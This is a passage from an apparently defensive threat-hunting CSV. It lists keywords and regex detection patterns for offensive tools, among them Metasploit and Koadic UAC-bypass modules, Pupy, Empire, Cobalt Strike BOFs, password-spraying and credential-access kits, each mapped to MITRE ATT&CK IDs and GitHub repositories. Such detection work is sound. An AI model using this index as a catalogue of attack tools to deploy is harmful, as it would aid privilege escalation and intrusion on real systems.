TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_fodhelper*",".{0,1000}bypassuac_fodhelper.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_injection*",".{0,1000}bypassuac_injection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_injection.*",".{0,1000}bypassuac_injection\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_injection.rb*",".{0,1000}bypassuac_injection\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_injection_winsxs.rb*",".{0,1000}bypassuac_injection_winsxs\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_registry.*",".{0,1000}bypassuac_registry\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*bypassuac_sdclt*",".{0,1000}bypassuac_sdclt.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_silentcleanup.rb*",".{0,1000}bypassuac_silentcleanup\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_slui*",".{0,1000}bypassuac_slui.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_sluihijack.*",".{0,1000}bypassuac_sluihijack\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_systempropertiesadvanced*",".{0,1000}bypassuac_systempropertiesadvanced.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*bypassuac_token_imp.*",".{0,1000}bypassuac_token_imp\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*bypassuac_vbs.*",".{0,1000}bypassuac_vbs\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_windows_store_reg.rb*",".{0,1000}bypassuac_windows_store_reg\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac_wsreset*",".{0,1000}bypassuac_wsreset.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*BypassUACTokenManipulation*",".{0,1000}BypassUACTokenManipulation.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1122","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik 
Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*bypassuac-x64.dll*",".{0,1000}bypassuac\-x64\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac-x64.exe*",".{0,1000}bypassuac\-x64\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac-x86.dll*",".{0,1000}bypassuac\-x86\.dll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypassuac-x86.exe*",".{0,1000}bypassuac\-x86\.exe.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*bypasswaf.jar*",".{0,1000}bypasswaf\.jar.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","1","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*bypasswaf.jar*",".{0,1000}bypasswaf\.jar.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","326","109","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" "*bypasswaf.py*",".{0,1000}bypasswaf\.py.{0,1000}","offensive_tool_keyword","bypasswaf","Add headers to all Burp requests to bypass some WAF products","T1090 - T1189 - T1001","TA0002 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/codewatchorg/bypasswaf","1","1","N/A","N/A","4","326","109","2018-01-28T13:13:39Z","2014-11-17T01:29:35Z" "*byt3bl33d3r*",".{0,1000}byt3bl33d3r.{0,1000}","offensive_tool_keyword","Github Username","malware and offensive tools developer 
","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/byt3bl33d3r","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*byt3bl33d3r/BOF-Nim*",".{0,1000}byt3bl33d3r\/BOF\-Nim.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF Files with Nim!","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/byt3bl33d3r/BOF-Nim","1","1","N/A","10","10","85","13","2022-07-10T22:12:10Z","2021-01-12T18:58:23Z" "*byt3bl33d3r/DeathStar*",".{0,1000}byt3bl33d3r\/DeathStar.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1178","170","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" "*byt3bl33d3r/dnschef-ng*",".{0,1000}byt3bl33d3r\/dnschef\-ng.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers 
and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","1","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*byt3bl33d3r/gcat*",".{0,1000}byt3bl33d3r\/gcat.{0,1000}","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","1","N/A","10","10","1316","422","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" "*byt3bl33d3r/ItWasAllADream*",".{0,1000}byt3bl33d3r\/ItWasAllADream.{0,1000}","offensive_tool_keyword","ItWasAllADream","A PrintNightmare (CVE-2021-34527) Python Scanner. 
Scan entire subnets for hosts vulnerable to the PrintNightmare RCE","T1046 - T1210.002 - T1047","TA0007 - TA0002","N/A","N/A","Discovery","https://github.com/byt3bl33d3r/ItWasAllADream","1","1","N/A","7","8","746","114","2023-08-25T16:11:40Z","2021-07-05T20:13:49Z" "*byt3bl33d3r/NimDllSideload*",".{0,1000}byt3bl33d3r\/NimDllSideload.{0,1000}","offensive_tool_keyword","NimDllSideload","DLL sideloading/proxying","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/byt3bl33d3r/NimDllSideload","1","1","N/A","9","2","157","17","2022-12-04T21:52:49Z","2022-12-03T03:25:57Z" "*byt3bl33d3r/pth-toolkit*",".{0,1000}byt3bl33d3r\/pth\-toolkit.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*byt3bl33d3r/SpamChannel*",".{0,1000}byt3bl33d3r\/SpamChannel.{0,1000}","offensive_tool_keyword","SpamChannel","Spoof emails from any of the +2 Million domains using MailChannels","T1566 - T1566.001","TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/SpamChannel","1","1","N/A","8","4","305","30","2023-09-21T12:25:03Z","2022-12-20T21:31:55Z" "*byt3bl33d3r/SprayingToolkit*",".{0,1000}byt3bl33d3r\/SprayingToolkit.{0,1000}","offensive_tool_keyword","SprayingToolkit","Scripts to make password spraying attacks against Lync/S4B. OWA & O365 a lot quicker. 
less painful and more efficient","T1110 - T1078 - T1133 - T1061","TA0001 - TA0002 - TA0003","N/A","N/A","Credential Access","https://github.com/byt3bl33d3r/SprayingToolkit","1","1","N/A","10","10","1418","263","2022-10-17T01:01:57Z","2018-09-13T09:52:11Z" "*byt3bl33d3r@pm.me*",".{0,1000}byt3bl33d3r\@pm\.me.{0,1000}","offensive_tool_keyword","dnschef-ng","DNSChef is a highly configurable DNS proxy for Penetration Testers and Malware Analysts. A DNS proxy (aka ""Fake DNS"") is a tool used for application network traffic analysis among other uses. For example - a DNS proxy can be used to fake requests for ""badguy.com"" to point to a local machine for termination or interception instead of a real host somewhere on the Internet.","T1568 - T1583 - T1071","TA0001 - TA0042 - TA0005","N/A","N/A","Sniffing & Spoofing","https://github.com/byt3bl33d3r/dnschef-ng","1","0","N/A","8","2","108","9","2023-11-26T06:57:04Z","2021-12-24T21:07:29Z" "*-c /tmp/redsocks.conf*",".{0,1000}\-c\s\/tmp\/redsocks\.conf.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*-c 854A20FB-2D44-457D-992F-EF13785D2B51*",".{0,1000}\-c\s854A20FB\-2D44\-457D\-992F\-EF13785D2B51.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "*-c BOF.cpp -o BOF.o*",".{0,1000}\-c\sBOF\.cpp\s\-o\sBOF\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*-c BOF.cpp -o BOF.x64.o*",".{0,1000}\-c\sBOF\.cpp\s\-o\sBOF\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - 
T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/crypt0p3g/bof-collection","1","0","N/A","10","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*-c credentialmanager.c -o 